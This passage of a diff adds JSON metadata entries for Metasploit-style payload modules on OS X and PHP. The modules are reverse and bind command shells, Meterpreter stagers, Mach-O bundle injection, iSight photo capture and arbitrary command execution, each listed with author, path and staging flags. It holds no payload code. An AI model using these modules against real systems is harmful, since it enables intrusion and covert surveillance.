"stager_refname": "osx/armle/bind_tcp" + }, + "payload_osx/armle/shell/reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/shell", + "stager_refname": "osx/armle/reverse_tcp" + }, + "payload_osx/armle/shell_bind_tcp": { + "name": "Apple iOS Command Shell, Bind TCP Inline", + "fullname": "payload/osx/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/shell_reverse_tcp": { + "name": "Apple iOS Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/armle/shell_reverse_tcp", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/vibrate": { + "name": "Apple iOS iPhone Vibrate", + "fullname": "payload/osx/armle/vibrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller .", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/vibrate.rb", + "is_install_path": true, + "ref_name": "osx/armle/vibrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/ppc/shell/bind_tcp": { + "name": "OS X Command Shell, Bind TCP Stager", + "fullname": "payload/osx/ppc/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + 
"targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/bind_tcp" + }, + "payload_osx/ppc/shell/find_tag": { + "name": "OS X Command Shell, Find Tag Stager", + "fullname": "payload/osx/ppc/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/find_tag" + }, + "payload_osx/ppc/shell/reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/ppc/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", + "is_install_path": true, + "ref_name": 
"osx/ppc/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/reverse_tcp" + }, + "payload_osx/ppc/shell_bind_tcp": { + "name": "OS X Command Shell, Bind TCP Inline", + "fullname": "payload/osx/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/ppc/shell_reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/dupandexecve/bind_tcp": { + 
"name": "OS X dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/osx/x64/dupandexecve/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "nemo " + ], + "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/bind_tcp" + }, + "payload_osx/x64/dupandexecve/reverse_tcp": { + "name": "OS X dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/x64/dupandexecve/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "nemo " + ], + "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/reverse_tcp" + }, + "payload_osx/x64/dupandexecve/reverse_tcp_uuid": { + "name": "OS X dup2 Command Shell, Reverse 
TCP Stager with UUID Support (OSX x64)", + "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "timwr" + ], + "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/reverse_tcp_uuid" + }, + "payload_osx/x64/exec": { + "name": "OS X x64 Execute Command", + "fullname": "payload/osx/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/exec.rb", + "is_install_path": true, + "ref_name": "osx/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/meterpreter/bind_tcp": { + "name": "OSX Meterpreter, Bind TCP Stager", + "fullname": "payload/osx/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + 
"nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/bind_tcp" + }, + "payload_osx/x64/meterpreter/reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Stager", + "fullname": "payload/osx/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + "nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/reverse_tcp" + }, + "payload_osx/x64/meterpreter/reverse_tcp_uuid": { + "name": 
"OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)", + "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/reverse_tcp_uuid" + }, + "payload_osx/x64/meterpreter_reverse_http": { + "name": "OSX Meterpreter, Reverse HTTP Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + 
"staged": false + }, + "payload_osx/x64/meterpreter_reverse_https": { + "name": "OSX Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/meterpreter_reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/say": { + "name": "OS X x64 say Shellcode", + "fullname": "payload/osx/x64/say", + "aliases": [], + "rank": 300, + "disclosure_date": null, + 
"type": "payload", + "author": [ + "nemo " + ], + "description": "Say an arbitrary string outloud using Mac OS X text2speech", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/say.rb", + "is_install_path": true, + "ref_name": "osx/x64/say", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_bind_tcp": { + "name": "OS X x64 Shell Bind TCP", + "fullname": "payload/osx/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_find_tag": { + "name": "OSX Command Shell, Find Tag Inline", + "fullname": "payload/osx/x64/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/osx/x64/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_reverse_tcp": { + "name": "OS X x64 Shell Reverse TCP", + "fullname": "payload/osx/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/bundleinject/bind_tcp": { + "name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager", + "fullname": "payload/osx/x86/bundleinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/bundleinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/bundleinject", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/bundleinject/reverse_tcp": { + "name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager", + "fullname": "payload/osx/x86/bundleinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/bundleinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/bundleinject", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/exec": { + "name": "OS X Execute Command", + "fullname": "payload/osx/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "snagg ", + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/exec.rb", + "is_install_path": true, + "ref_name": "osx/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/isight/bind_tcp": { + "name": "Mac OS X x86 iSight Photo Capture, Bind TCP 
Stager", + "fullname": "payload/osx/x86/isight/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/isight/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/isight", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/isight/reverse_tcp": { + "name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager", + "fullname": "payload/osx/x86/isight/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/isight/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/isight", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/shell_bind_tcp": { + "name": "OS X Command Shell, Bind TCP Inline", + "fullname": 
"payload/osx/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/shell_find_port": { + "name": "OS X Command Shell, Find Port Inline", + "fullname": "payload/osx/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/shell_reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/vforkshell/bind_tcp": { + "name": "OS X (vfork) Command Shell, Bind TCP Stager", + "fullname": "payload/osx/x86/vforkshell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/vforkshell", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/vforkshell/reverse_tcp": { + "name": "OS X (vfork) Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/x86/vforkshell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 
11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/vforkshell", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/vforkshell_bind_tcp": { + "name": "OS X (vfork) Command Shell, Bind TCP Inline", + "fullname": "payload/osx/x86/vforkshell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Listen for a connection, vfork if necessary, and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/vforkshell_reverse_tcp": { + "name": "OS X (vfork) Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/x86/vforkshell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Connect back to attacker, vfork if necessary, and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/vforkshell_reverse_tcp", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_perl": { + "name": "PHP Command Shell, Bind TCP (via Perl)", + "fullname": "payload/php/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_perl.rb", + "is_install_path": true, + "ref_name": "php/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_perl_ipv6": { + "name": 